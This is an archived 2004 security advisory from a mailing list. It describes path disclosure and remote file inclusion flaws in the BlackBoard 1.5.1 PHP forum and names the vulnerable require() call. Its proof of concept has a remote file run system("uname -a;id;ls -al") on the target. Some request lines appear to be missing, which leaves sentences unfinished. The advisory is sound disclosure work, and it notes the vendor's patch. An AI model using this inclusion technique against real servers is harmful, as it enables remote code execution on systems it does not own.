[UNIX] BlackBoard Path Disclosure and File Inclusion Vulnerabilities

From: SecuriTeam (support_at_securiteam.com)
Date: 10/11/04

  • Next message: SecuriTeam: "[UNIX] HTTP Response Splitting in WordPress"
    To: list@securiteam.com
    Date: 11 Oct 2004 19:16:48 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.

    - - - - - - - - -

      BlackBoard Path Disclosure and File Inclusion Vulnerabilities


     <http://blackboard.unclassified.de/> BlackBoard is "an open-source,
    PHP-based internet bulletin board software, almost like any other around".

    Two vulnerabilities have been discovered in BlackBoard, a path disclosure
    vulnerability and a file inclusion vulnerability. Using the file inclusion
    vulnerability it is possible to cause the remote site to execute arbitrary
    code, using the path disclosure vulnerability it is possible to discover
    the true path under which the product has been installed.


    Vulnerable Systems:
     * BlackBoard version 1.5.1

    Path Disclosure:
    By requesting the following file it is possible to retrieve the actual
    path under which the BlackBoard product is installed:

    The response would look like:
    Warning: main(lang/_more.php): failed to open stream: No such file or
    directory in /www/web002/_blackboard/bb_lib/checkdb.inc.php on line 15

    Fatal error: main(): Failed opening required 'lang/_more.php'
    (include_path='.:/usr/local/lib/php') in
    /www/web002/_blackboard/bb_lib/checkdb.inc.php on line 15

    The same issue also occurs in admin.inc.php, cp.inc.php and others.

    File Inclusion:
    The /bb_lib/admin.inc.php incorrectly uses the following unsensitized
    require function call:
    require($libpath . 'lang/' . $LANG . '_more.php');

    Meaning anyone can replace the libpath parameter with whichever file they
    desire causing the inclusion of arbitrary files.

    Create a file called _more.php on your web site with the following
    system("uname -a;id;ls -al");

    Then issue a request of the sorts of, to cause it to get included and

    Vendor response:
    The vendor has issued a patch that addresses this issues.


    The information has been provided by <mailto:Cracklove@gmail.com> Lin


    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[UNIX] HTTP Response Splitting in WordPress"